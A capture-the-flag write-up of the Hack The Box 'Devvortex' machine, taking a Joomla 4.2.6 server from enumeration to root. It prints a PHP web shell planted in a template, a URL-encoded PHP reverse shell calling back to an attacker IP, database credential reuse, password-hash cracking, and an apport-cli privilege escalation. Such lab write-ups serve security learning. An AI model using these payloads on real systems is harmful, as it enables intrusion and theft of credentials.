Target IP: 10.129.229.146
Challenge Description: N/A.
Performing a port scan using the command sudo nmap -sS 10.129.229.146 -p- returns the result shown above. According to the scan above, there are two TCP ports open on the target machine.
I performed an aggressive port scan against the target machine using the command sudo nmap -sV -A 10.129.229.146 -p 22,80 and obtained the result shown above. I notice the HTTP request gets directed to http://devvortex.htb. Therefore, I will insert this username inside my /etc/hosts file. Time to perform a subdomain search using ffuf.
Using the command ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154, I performed a subdomain search and identified the subdomain dev.devvortex.htb as shown above. Time to insert this new subdomain name inside my /etc/hosts file.
Now my /etc/hosts file contains the entry shown above. Time to perform enumeration.
Port 80: HTTP (dev.devvortex.htb)
While performing a directory search against this subdomain using the command gobuster dir -u http://dev.devvortex.htb -w /usr/share/wordlists/dirb/big.txt -x html,php,txt, I identified an interesting entry with the name /README.txt. Browsing to this page contains the information shown above. By the looks of it, the target machine is running Joomla CMS. But what version is it? Time to find out.
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://dev.devvortex.htb ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 4.2.6
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://dev.devvortex.htb/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://dev.devvortex.htb/robots.txt
Interesting path found from robots.txt
http://dev.devvortex.htb/joomla/administrator/
http://dev.devvortex.htb/administrator/
http://dev.devvortex.htb/api/
http://dev.devvortex.htb/bin/
http://dev.devvortex.htb/cache/
http://dev.devvortex.htb/cli/
http://dev.devvortex.htb/components/
http://dev.devvortex.htb/includes/
http://dev.devvortex.htb/installation/
http://dev.devvortex.htb/language/
http://dev.devvortex.htb/layouts/
http://dev.devvortex.htb/libraries/
http://dev.devvortex.htb/logs/
http://dev.devvortex.htb/modules/
http://dev.devvortex.htb/plugins/
http://dev.devvortex.htb/tmp/
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/dev.devvortex.htb/
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://dev.devvortex.htb ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 4.2.6
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://dev.devvortex.htb/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://dev.devvortex.htb/robots.txt
Interesting path found from robots.txt
http://dev.devvortex.htb/joomla/administrator/
http://dev.devvortex.htb/administrator/
http://dev.devvortex.htb/api/
http://dev.devvortex.htb/bin/
http://dev.devvortex.htb/cache/
http://dev.devvortex.htb/cli/
http://dev.devvortex.htb/components/
http://dev.devvortex.htb/includes/
http://dev.devvortex.htb/installation/
http://dev.devvortex.htb/language/
http://dev.devvortex.htb/layouts/
http://dev.devvortex.htb/libraries/
http://dev.devvortex.htb/logs/
http://dev.devvortex.htb/modules/
http://dev.devvortex.htb/plugins/
http://dev.devvortex.htb/tmp/
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/dev.devvortex.htb/Using the tool joomscan and the command joomscan -u http://dev.devvortex.htb, I obtained the result shown above. The target machine is running Joomla 4.2.6 as shownb above. This tool also identified interesting directories. Although the tool states there are no vulnerabilities for this version, I will need to search further.
And bingo! I searched for Joomla 4.2.6 vulnerability on Google and identified multiple results shown above. According to the results, it looks like this version suffers from information disclosure vulnerability. The CVE identifier for this vulnerability is CVE-2023-23752, as shown above.
I also managed to find a verified exploit for this vulnerability at https://www.exploit-db.com/exploits/51334 using Exploit Database, as shown above. Time to make a copy of the exploit on my machine and run it against the target machine's web application. Since the tool is created in ruby, I will search for a Python exploit instead.
Searching for a working exploit on Github for the vulnerability, I found the repository shown above. I made a copy of the exploit on my machine with the name as exp.py. Time to test it :)
I ran the exploit using the command python3 exp.py. Then I used the mode 1 and targetted the hostname http://dev.devvortex.htb and got a hit, as shown above. This exploit successfully disclosed the credentials lewis:P4ntherg0t1n5r3c0n##.
From previous enumeration, I identified the administrator page of Joomla is at http://dev.devvortex.htb/administrator. Maybe I can use the credentials here? Time to find out.
And bingo! I successfully logged into the administrator panel using the disclosed credentials via the exploit, as shown above. Since this user lewis is the administrator on this CMS, I will need to find a vector to obtain a foothold on the target machine. This is doable by overwriting one of the template file with a shell to obtain a reverse shell connection.
I browsed to the System menu first. This is where the Site Templates are located, as shown above.
I notice the target machine is using Cassiopeia template, as shown above. Time to overwrite one of the PHP files inside this template and insert my PHP web shell to obtain a reverse shell connection.
I decided to overwrite the error.php, as shown above.
I inserted the PHP code system($_GET['totally_not_a_sh3ll']); as shown above inside the error.php. Now I should be able to access my web shell. Time to test it.
And bingo! I browsed to http://dev.devvortex.htb/templates/cassiopeia/error.php?totally_not_a_sh3ll=id;whoami;ls and ran the commands id;whoami;ls and obtained the result shown above. My web shell is working successfully. Time to obtain a reverse shell connection now using this web shell.
I started a listener on my machine at port 8443. Then I deployed the URL-encoded PHP reverse shell code php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.14.112%22%2C8443%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 via the web shell and obtained a reverse shell connection as shown above. Now I have a foothold on the target machine with the session as www-data :) Then I upgraded my shell to a pty shell via python using the command python -c 'import pty; pty.spawn("/bin/bash")'.
From previous enumeration, I identified there is a database application running on the target machine. I decided to test the credentials I obtained via the exploit and obtained a session, as shown above. The command I used is mysql -h localhost -u lewis -p'P4ntherg0t1n5r3c0n##'. Then I ran the command show databases; and identified the database joomla. Maybe I can obtain interesting information inside this database? I used the command use joomla; to use this database;
Using the command select * from sd4fg_users;, I obtained two entries shown above. Since one of the host on the target machine is a user called logan, maybe cracking the password hash shown above can help? I saved the password hash $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 of the user logan on my machine inside a file called hash to crack it using john.
To crack the hash, I used the command john hash --wordlist=/usr/share/wordlists/rockyou.txt. I successfully obtained the password tequieromucho belonging to the user logan, as shown above.
Using su logan and the new password tequieromucho, I was able to successfully switch to the user logan as shown above. I successfully escalated my privileges from www-data to logan horizontally.
Running sudo -l returns the entry (ALL : ALL) /usr/bin/apport-cli. The binary aport-cli is executable as root. I did a Google search for this binary and obtained multiple privilege esclation techniques. One being the vulnerability with the CVE id of cve-2023-1326.
Obtaining a root shell was pretty simple. I followed the instructions at https://diegojoelcondoriquispe.medium.com/cve-2023-1326-poc-c8f2a59d0e00. GG. This challenge was a lot of fun and the privilege escalation was a joy.
The two flags are shown above.